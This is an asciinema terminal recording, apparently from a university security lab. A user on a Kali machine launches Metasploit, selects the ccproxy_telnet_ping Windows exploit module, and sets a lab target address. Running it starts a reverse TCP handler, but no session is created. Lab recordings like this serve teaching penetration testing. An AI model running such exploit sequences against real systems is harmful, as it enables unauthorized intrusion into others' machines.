{"version": 2, "width": 80, "height": 24, "timestamp": 1540257927, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}}
[0.064317, "o", "\u001b]0;root@kali-x43-35: ~/GitHub/itms-443/labs/4/scripts\u0007\u001b[01;31mroot@kali-x43-35\u001b[00m:\u001b[01;34m~/GitHub/itms-443/labs/4/scripts\u001b[00m# "]
[1.031685, "o", "m"]
[1.236756, "o", "e"]
[1.594129, "o", "\b\u001b[K"]
[1.716748, "o", "s"]
[1.978957, "o", "f"]
[2.286349, "o", "c"]
[2.493956, "o", "onsole "]
[2.889596, "o", "\r\n"]
[8.121313, "o", "[*] Starting the Metasploit Framework console.../\r"]
[8.223179, "o", "[*] Starting the Metasploit Framework console...-\r"]
[8.323713, "o", "[*] Starting the Metasploit Framework console...\\\r"]
[8.446638, "o", "[*] starting the Metasploit Framework console...|\r"]
[8.552538, "o", "[*] STarting the Metasploit Framework console.../\r"]
[8.612565, "o", "\u001b[1m\u001b[31m[-]\u001b[0m Failed to connect to the database: could not connect to server: Connection refused\r\n\tIs the server running on host \"localhost\" (::1) and accepting\r\n\tTCP/IP connections on port 5432?\r\ncould not connect to server: Connection refused\r\n\tIs the server running on host \"localhost\" (127.0.0.1) and accepting\r\n\tTCP/IP connections on port 5432?\r\n\r\n"]
[8.659107, "o", "[*] StArting the Metasploit Framework console...-\r"]
[8.759676, "o", "[*] StaRting the Metasploit Framework console...\\\r"]
[8.873119, "o", "[*] StarTing the Metasploit Framework console...|\r"]
[8.975286, "o", "[*] StartIng the Metasploit Framework console.../\r"]
[9.079358, "o", "[*] StartiNg the Metasploit Framework console...-\r"]
[9.184579, "o", "[*] StartinG the Metasploit Framework console...\\\r"]
[9.288855, "o", "[*] Starting the Metasploit Framework console...|\r"]
[9.388866, "o", "[*] Starting The Metasploit Framework console.../\r"]
[9.489473, "o", "[*] Starting tHe Metasploit Framework console...-\r"]
[9.590374, "o", "[*] Starting thE Metasploit Framework console...\\\r"]
[9.690846, "o", "[*] Starting the Metasploit Framework console...|\r"]
[9.810862, "o", "[*] Starting the metasploit Framework console.../\r"]
[9.912183, "o", "[*] Starting the MEtasploit Framework console...-\r"]
[10.01247, "o", "[*] Starting the MeTasploit Framework console...\\\r"]
[10.113281, "o", "[*] Starting the MetAsploit Framework console...|\r"]
[10.213765, "o", "[*] Starting the MetaSploit Framework console.../\r"]
[10.314054, "o", "[*] Starting the MetasPloit Framework console...-\r"]
[10.414934, "o", "[*] Starting the MetaspLoit Framework console...\\\r"]
[10.519432, "o", "[*] Starting the MetasplOit Framework console...|\r"]
[10.622172, "o", "[*] Starting the MetasploIt Framework console.../\r"]
[10.725224, "o", "[*] Starting the MetasploiT Framework console...-\r"]
[10.827979, "o", "[*] Starting the Metasploit Framework console...\\\r"]
[10.93769, "o", "[*] Starting the Metasploit framework console...|\r"]
[11.038672, "o", "[*] Starting the Metasploit FRamework console.../\r"]
[11.139329, "o", "[*] Starting the Metasploit FrAmework console...-\r"]
[11.240096, "o", "[*] Starting the Metasploit FraMework console...\\\r"]
[11.343596, "o", "[*] Starting the Metasploit FramEwork console...|\r"]
[11.448322, "o", "[*] Starting the Metasploit FrameWork console.../\r"]
[11.548651, "o", "[*] Starting the Metasploit FramewOrk console...-\r"]
[11.659431, "o", "[*] Starting the Metasploit FramewoRk console...\\\r"]
[11.761033, "o", "[*] Starting the Metasploit FrameworK console...|\r"]
[11.861583, "o", "[*] Starting the Metasploit Framework console.../\r"]
[11.962516, "o", "[*] Starting the Metasploit Framework Console...-\r"]
[12.063281, "o", "[*] Starting the Metasploit Framework cOnsole...\\\r"]
[12.166902, "o", "[*] Starting the Metasploit Framework coNsole...|\r"]
[12.267073, "o", "[*] Starting the Metasploit Framework conSole.../\r"]
[12.367249, "o", "[*] Starting the Metasploit Framework consOle...-\r"]
[12.467585, "o", "[*] Starting the Metasploit Framework consoLe...\\\r"]
[12.569342, "o", "[*] Starting the Metasploit Framework consolE...|\r"]
[12.670217, "o", "[*] Starting the Metasploit Framework console.../\r"]
[12.774867, "o", "[*] Starting the Metasploit Framework console...-\r"]
[12.877322, "o", "[*] Starting the Metasploit Framework console...\\\r"]
[12.98158, "o", "[*] Starting the Metasploit Framework console...|\r"]
[13.083244, "o", "[*] Starting the Metasploit Framework console.../\r"]
[13.184621, "o", "[*] Starting the Metasploit Framework console...-\r"]
[13.286773, "o", "[*] Starting the Metasploit Framework console...\\\r"]
[13.387054, "o", "[*] starting the Metasploit Framework console...|\r"]
[13.48726, "o", "[*] STarting the Metasploit Framework console.../\r"]
[13.59637, "o", "[*] StArting the Metasploit Framework console...-\r"]
[13.697781, "o", "[*] StaRting the Metasploit Framework console...\\\r"]
[13.799175, "o", "[*] StarTing the Metasploit Framework console...|\r"]
[13.901846, "o", "[*] StartIng the Metasploit Framework console.../\r"]
[14.002832, "o", "[*] StartiNg the Metasploit Framework console...-\r"]
[14.106549, "o", "[*] StartinG the Metasploit Framework console...\\\r"]
[14.207443, "o", "[*] Starting the Metasploit Framework console...|\r"]
[14.323123, "o", "[*] Starting The Metasploit Framework console.../\r"]
[14.43749, "o", "[*] Starting tHe Metasploit Framework console...-\r"]
[14.537613, "o", "[*] Starting thE Metasploit Framework console...\\\r"]
[14.638136, "o", "[*] Starting the Metasploit Framework console...|\r"]
[14.740555, "o", "[*] Starting the metasploit Framework console.../\r"]
[14.839521, "o", "[*] Starting the MEtasploit Framework console...-\r"]
[14.939646, "o", "[*] Starting the MeTasploit Framework console...\\\r"]
[15.039866, "o", "[*] Starting the MetAsploit Framework console...|\r"]
[15.140071, "o", "[*] Starting the MetaSploit Framework console.../\r"]
[15.240286, "o", "[*] Starting the MetasPloit Framework console...-\r"]
[15.340432, "o", "[*] Starting the MetaspLoit Framework console...\\\r"]
[15.440778, "o", "[*] Starting the MetasplOit Framework console...|\r"]
[15.541005, "o", "[*] Starting the MetasploIt Framework console.../\r"]
[15.641355, "o", "[*] Starting the MetasploiT Framework console...-\r"]
[15.742787, "o", "[*] Starting the Metasploit Framework console...\\\r"]
[15.843068, "o", "[*] Starting the Metasploit framework console...|\r"]
[15.943877, "o", "[*] Starting the Metasploit FRamework console.../\r"]
[16.045246, "o", "[*] Starting the Metasploit FrAmework console...-\r"]
[16.146036, "o", "[*] Starting the Metasploit FraMework console...\\\r"]
[16.249415, "o", "[*] Starting the Metasploit FramEwork console...|\r"]
[16.349641, "o", "[*] Starting the Metasploit FrameWork console.../\r"]
[16.451271, "o", "[*] Starting the Metasploit FramewOrk console...-\r"]
[16.552535, "o", "[*] Starting the Metasploit FramewoRk console...\\\r"]
[16.657959, "o", "[*] Starting the Metasploit FrameworK console...|\r"]
[16.759916, "o", "[*] Starting the Metasploit Framework console.../\r"]
[16.86029, "o", "[*] Starting the Metasploit Framework Console...-\r"]
[16.964581, "o", "[*] Starting the Metasploit Framework cOnsole...\\\r"]
[17.065083, "o", "[*] Starting the Metasploit Framework coNsole...|\r"]
[17.165636, "o", "[*] Starting the Metasploit Framework conSole.../\r"]
[17.266041, "o", "[*] Starting the Metasploit Framework consOle...-\r"]
[17.367118, "o", "[*] Starting the Metasploit Framework consoLe...\\\r"]
[17.470838, "o", "[*] Starting the Metasploit Framework consolE...|\r"]
[17.572485, "o", "[*] Starting the Metasploit Framework console.../\r"]
[17.674303, "o", "[*] Starting the Metasploit Framework console...-\r"]
[17.778024, "o", "[*] Starting the Metasploit Framework console...\\\r"]
[17.878644, "o", "[*] Starting the Metasploit Framework console...|\r"]
[17.978739, "o", "[*] Starting the Metasploit Framework console.../\r"]
[18.146571, "o", "[*] Starting the Metasploit Framework console...-\r"]
[18.247998, "o", "[*] Starting the Metasploit Framework console...\\\r"]
[18.350182, "o", "[*] starting the Metasploit Framework console...|\r"]
[18.450895, "o", "[*] STarting the Metasploit Framework console.../\r"]
[18.553871, "o", "[*] StArting the Metasploit Framework console...-\r"]
[18.655375, "o", "[*] StaRting the Metasploit Framework console...\\\r"]
[18.756338, "o", "[*] StarTing the Metasploit Framework console...|\r"]
[18.858085, "o", "[*] StartIng the Metasploit Framework console.../\r"]
[18.958337, "o", "[*] StartiNg the Metasploit Framework console...-\r"]
[19.058473, "o", "[*] StartinG the Metasploit Framework console...\\\r"]
[19.158727, "o", "[*] Starting the Metasploit Framework console...|\r"]
[19.258976, "o", "[*] Starting The Metasploit Framework console.../\r"]
[19.359298, "o", "[*] Starting tHe Metasploit Framework console...-\r"]
[19.459487, "o", "[*] Starting thE Metasploit Framework console...\\\r"]
[19.559746, "o", "[*] Starting the Metasploit Framework console...|\r"]
[19.660063, "o", "[*] Starting the metasploit Framework console.../\r"]
[19.760288, "o", "[*] Starting the MEtasploit Framework console...-\r"]
[19.860688, "o", "[*] Starting the MeTasploit Framework console...\\\r"]
[19.985485, "o", "[*] Starting the MetAsploit Framework console...|\r"]
[20.086182, "o", "[*] Starting the MetaSploit Framework console.../\r"]
[20.209353, "o", "[*] Starting the MetasPloit Framework console...-\r"]
[20.309792, "o", "[*] Starting the MetaspLoit Framework console...\\\r"]
[20.413196, "o", "[*] Starting the MetasplOit Framework console...|\r"]
[20.51373, "o", "[*] Starting the MetasploIt Framework console.../\r"]
[20.648841, "o", "[*] Starting the MetasploiT Framework console...-\r"]
[20.753591, "o", "[*] Starting the Metasploit Framework console...\\\r"]
[20.853819, "o", "[*] Starting the Metasploit framework console...|\r"]
[20.95408, "o", "[*] Starting the Metasploit FRamework console.../\r"]
[21.054198, "o", "[*] Starting the Metasploit FrAmework console...-\r"]
[21.15461, "o", "[*] Starting the Metasploit FraMework console...\\\r"]
[21.254862, "o", "[*] Starting the Metasploit FramEwork console...|\r"]
[21.355211, "o", "[*] Starting the Metasploit FrameWork console.../\r"]
[21.455376, "o", "[*] Starting the Metasploit FramewOrk console...-\r"]
[21.555623, "o", "[*] Starting the Metasploit FramewoRk console...\\\r"]
[21.655898, "o", "[*] Starting the Metasploit FrameworK console...|\r"]
[21.756234, "o", "[*] Starting the Metasploit Framework console.../\r"]
[21.856574, "o", "[*] Starting the Metasploit Framework Console...-\r"]
[21.956948, "o", "[*] Starting the Metasploit Framework cOnsole...\\\r"]
[22.057207, "o", "[*] Starting the Metasploit Framework coNsole...|\r"]
[22.157526, "o", "[*] Starting the Metasploit Framework conSole.../\r"]
[22.257709, "o", "[*] Starting the Metasploit Framework consOle...-\r"]
[22.358345, "o", "[*] Starting the Metasploit Framework consoLe...\\\r"]
[22.458623, "o", "[*] Starting the Metasploit Framework consolE...|\r"]
[22.5588, "o", "[*] Starting the Metasploit Framework console.../\r"]
[22.67537, "o", "[*] Starting the Metasploit Framework console...-\r"]
[22.7766, "o", "[*] Starting the Metasploit Framework console...\\\r"]
[22.876824, "o", "[*] Starting the Metasploit Framework console...|\r"]
[22.977112, "o", "[*] Starting the Metasploit Framework console.../\r"]
[23.077325, "o", "[*] Starting the Metasploit Framework console...-\r"]
[23.17771, "o", "[*] Starting the Metasploit Framework console...\\\r"]
[23.27794, "o", "[*] starting the Metasploit Framework console...|\r"]
[23.378148, "o", "[*] STarting the Metasploit Framework console.../\r"]
[23.478503, "o", "[*] StArting the Metasploit Framework console...-\r"]
[23.578721, "o", "[*] StaRting the Metasploit Framework console...\\\r"]
[23.678893, "o", "[*] StarTing the Metasploit Framework console...|\r"]
[23.779197, "o", "[*] StartIng the Metasploit Framework console.../\r"]
[23.883654, "o", "[*] StartiNg the Metasploit Framework console...-\r"]
[23.983969, "o", "[*] StartinG the Metasploit Framework console...\\\r"]
[24.08403, "o", "[*] Starting the Metasploit Framework console...|\r"]
[24.184328, "o", "[*] Starting The Metasploit Framework console.../\r"]
[24.284528, "o", "[*] Starting tHe Metasploit Framework console...-\r"]
[24.384722, "o", "[*] Starting thE Metasploit Framework console...\\\r"]
[24.484891, "o", "[*] Starting the Metasploit Framework console...|\r"]
[24.585413, "o", "[*] Starting the metasploit Framework console.../\r"]
[24.685448, "o", "[*] Starting the MEtasploit Framework console...-\r"]
[24.785738, "o", "[*] Starting the MeTasploit Framework console...\\\r"]
[24.885968, "o", "[*] Starting the MetAsploit Framework console...|\r"]
[24.986198, "o", "[*] Starting the MetaSploit Framework console.../\r"]
[25.086455, "o", "[*] Starting the MetasPloit Framework console...-\r"]
[25.186844, "o", "[*] Starting the MetaspLoit Framework console...\\\r"]
[25.286955, "o", "[*] Starting the MetasplOit Framework console...|\r"]
[25.404703, "o", "[*] Starting the MetasploIt Framework console.../\r"]
[25.504947, "o", "[*] Starting the MetasploiT Framework console...-\r"]
[25.605214, "o", "[*] Starting the Metasploit Framework console...\\\r"]
[25.706641, "o", "[*] Starting the Metasploit framework console...|\r"]
[25.788199, "o", "\r                                                  \r\n"]
[25.791255, "o", "\u001b[0m"]
[25.799359, "o", "\u001b[36m\u001b[37mIIIIII    \u001b[31mdTb.dTb\u001b[0m        _.---._\r\n\u001b[37m  II     \u001b[31m4'  v  'B\u001b[0m   .'\"\".'/|\\`.\"\"'.\r\n\u001b[37m  II     \u001b[31m6.     .P\u001b[0m  :  .' / | \\ `.  :\r\n\u001b[37m  II     \u001b[31m'T;. .;P'\u001b[0m  '.'  /  |  \\  `.'\r\n\u001b[37m  II      \u001b[31m'T; ;P'\u001b[0m    `. /   |   \\ .'\r\n\u001b[37mIIIIII     \u001b[31m'YvP'\u001b[0m       `-.__|__.-'"]
[25.799601, "o", "\r\n\r\nI love shells --egypt\r\n\u001b[0m\r\n\r\n       =[ \u001b[33mmetasploit v4.17.18-dev\u001b[0m                         ]\r\n+ -- --=[ 1818 exploits - 1031 auxiliary - 315 post       ]\r\n+ -- --=[ 539 payloads - 42 encoders - 10 nops            ]\r\n+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]\r\n\r\n"]
[26.073362, "o", "\u001b[?1034h"]
[26.20009, "o", "\u001b[4mmsf\u001b[0m \u001b[0m> "]
[27.117081, "o", "u"]
[27.260573, "o", "s"]
[27.346107, "o", "e"]
[27.44874, "o", " "]
[27.776336, "o", "e"]
[27.952575, "o", "x"]
[28.30515, "o", "\u0007"]
[28.305928, "o", "ploit/"]
[29.209419, "o", "w"]
[29.685495, "o", "\u0007"]
[29.68637, "o", "indows/"]
[31.145854, "o", "p"]
[31.187789, "o", "r"]
[31.348553, "o", "o"]
[31.61151, "o", "\u0007"]
[31.61276, "o", "xy/"]
[31.966344, "o", "c"]
[32.010693, "o", "c"]
[32.298206, "o", "proxy_telnet_ping "]
[32.818712, "o", "\r"]
[32.819176, "o", "\r\n"]
[32.907251, "o", "\u001b[0m"]
[33.108471, "o", "\u001b[4mmsf\u001b[0m exploit(\u001b[1m\u001b[31mwindows/proxy/ccproxy_telnet_ping\u001b[0m) \u001b[0m> "]
[35.71896, "o", "s"]
[35.869185, "o", "e"]
[36.039902, "o", "t"]
[36.154186, "o", " "]
[41.200881, "o", "C"]
[41.50111, "o", "H"]
[41.63538, "o", "O"]
[41.752209, "o", "S"]
[41.915703, "o", "T"]
[42.048196, "o", " "]
[42.690284, "o", "1"]
[43.050439, "o", "7"]
[43.298576, "o", "2"]
[43.520474, "o", "."]
[48.100559, "o", "\b\u001b[K"]
[48.262294, "o", "\b\u001b[K"]
[48.393495, "o", "\b\u001b[K"]
[48.519452, "o", "\b\u001b[K"]
[48.642062, "o", "\b\u001b[K"]
[48.779081, "o", "\b\u001b[K"]
[48.911419, "o", "\b\u001b[K"]
[49.05878, "o", "\b\u001b[K"]
[49.20045, "o", "\b\u001b[K"]
[49.944489, "o", "\b\u001b[K"]
[50.243381, "o", "R"]
[50.413394, "o", "H"]
[50.725285, "o", "\u0007"]
[50.726195, "o", "OST"]
[51.60217, "o", " "]
[52.703338, "o", "1"]
[53.289588, "o", "7"]
[53.573557, "o", "2"]
[53.877027, "o", "."]
[54.829832, "o", "4"]
[55.03208, "o", "3"]
[55.150295, "o", "."]
[55.441009, "o", "0"]
[55.720923, "o", "."]
[55.953145, "o", "1"]
[56.243585, "o", "5"]
[56.43158, "o", "4"]
[56.580056, "o", "\r\r\n"]
[56.609545, "o", "\u001b[0m"]
[56.612205, "o", "RHOST => 172.43.0.154\r\n"]
[56.750275, "o", "\u001b[4mmsf\u001b[0m exploit(\u001b[1m\u001b[31mwindows/proxy/ccproxy_telnet_ping\u001b[0m) \u001b[0m> "]
[57.821455, "o", "s"]
[57.998547, "o", "h"]
[58.115307, "o", "o"]
[58.233364, "o", "w"]
[58.361776, "o", " "]
[58.499753, "o", "o"]
[58.658265, "o", "p"]
[58.879383, "o", "t"]
[59.043235, "o", "ions "]
[59.493489, "o", "\r\r\n"]
[59.528042, "o", "\u001b[0m"]
[59.534545, "o", "\r\nModule options (exploit/windows/proxy/ccproxy_telnet_ping):\r\n\r\n   Name   Current Setting  Required  Description\r\n   ----   ---------------  --------  -----------\r\n   RHOST  172.43.0.154     yes       The target address\r\n"]
[59.534642, "o", "   RPORT  23               yes       The target port (TCP)\r\n\r\n"]
[59.538887, "o", "\r\nExploit target:\r\n\r\n   Id  Name\r\n   --  ----\r\n   0   Automatic\r\n\r\n"]
[59.539041, "o", "\r\n"]
[59.674299, "o", "\u001b[4mmsf\u001b[0m exploit(\u001b[1m\u001b[31mwindows/proxy/ccproxy_telnet_ping\u001b[0m) \u001b[0m> "]
[61.860509, "o", "e"]
[62.032094, "o", "x"]
[62.170899, "o", "p"]
[62.31319, "o", "l"]
[62.541553, "o", "o"]
[62.688524, "o", "it "]
[63.175704, "o", "\r\r\n"]
[63.206443, "o", "\u001b[0m"]
[71.619623, "o", "\r\n"]
[71.620334, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Started reverse TCP handler on 172.43.35.101:4444 \r\n"]
[73.829971, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Exploit completed, but no session was created.\r\n"]
[73.938342, "o", "\u001b[4mmsf\u001b[0m exploit(\u001b[1m\u001b[31mwindows/proxy/ccproxy_telnet_ping\u001b[0m) \u001b[0m> "]
[77.448563, "o", "\u001b[0m"]
[77.570963, "o", "\u001b]0;root@kali-x43-35: ~/GitHub/itms-443/labs/4/scripts\u0007\u001b[01;31mroot@kali-x43-35\u001b[00m:\u001b[01;34m~/GitHub/itms-443/labs/4/scripts\u001b[00m# "]
[78.390255, "o", "exit\r\n"]
